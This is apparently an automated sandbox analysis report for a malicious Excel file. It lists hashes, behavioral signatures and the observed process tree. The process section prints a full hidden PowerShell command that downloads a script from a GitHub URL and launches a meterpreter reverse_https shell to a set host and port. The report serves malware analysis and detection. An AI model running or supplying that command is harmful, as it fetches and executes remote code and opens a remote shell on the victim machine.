Analysis
-
max time kernel
35s -
max time network
44s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08-07-2024 21:24
Behavioral task
behavioral1
Sample
ece01bde92192565ce629b469868c4d4cc74f6a828bd155ed3cf3071aa75c47e.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ece01bde92192565ce629b469868c4d4cc74f6a828bd155ed3cf3071aa75c47e.xls
Resource
win10v2004-20240704-en
General
-
Target
ece01bde92192565ce629b469868c4d4cc74f6a828bd155ed3cf3071aa75c47e.xls
-
Size
44KB
-
MD5
ab098a36a56225c6fa52b9e5cde05d9a
-
SHA1
a61090ac643357d768b61ab3e75b1613404c3c9e
-
SHA256
ece01bde92192565ce629b469868c4d4cc74f6a828bd155ed3cf3071aa75c47e
-
SHA512
5fbe7d2b58086babb32ed8060ee5ede73a939f90275b1a666cd54d63b5264c1df8b8ddbc0064d7259a6b79c03cecf414a10315e6389eef56db492c4b79d7a92a
-
SSDEEP
768:jtvo+lzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSp5kuFlmQQpIvH9acc9acyL:jPk3hbdlylKsgqopeJBWhZFGkE+cL2N5
Malware Config
Extracted
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5116 2088 powershell.exe 81 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4172 440 wscript.exe 80 -
Blocklisted process makes network request 2 IoCs
flow pid Process 10 5116 powershell.exe 11 1288 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1288 powershell.exe 5116 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 9 raw.githubusercontent.com 10 raw.githubusercontent.com 11 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 440 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5116 powershell.exe 5116 powershell.exe 1288 powershell.exe 1288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5116 powershell.exe Token: SeDebugPrivilege 1288 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 440 EXCEL.EXE 440 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE 440 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 440 wrote to memory of 4172 440 EXCEL.EXE 86 PID 440 wrote to memory of 4172 440 EXCEL.EXE 86 PID 4172 wrote to memory of 1288 4172 wscript.exe 88 PID 4172 wrote to memory of 1288 4172 wscript.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ece01bde92192565ce629b469868c4d4cc74f6a828bd155ed3cf3071aa75c47e.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\SYSTEM32\wscript.exewscript C:\Users\Public\config.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD58fe526167cb3aa13d6148e710ae23e85
SHA1db4dcffb1a088f3b470a615a9cf643f4eb6afcb5
SHA256b6a26a5c683362d534d1ffcb4be7e74976bc165025f4408d265ffbb261163c8e
SHA5129c7f9746b835a5c98c2f4db8251ed283478393992a19162c419482aacb234ecc70f469bc64f58cb4fcf171a0034b5c4a11451a9b1e962b8422b5a95f1366db08
-
Filesize
461B
MD5ce52ab154163c511f0efa6a61e22ab64
SHA19f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78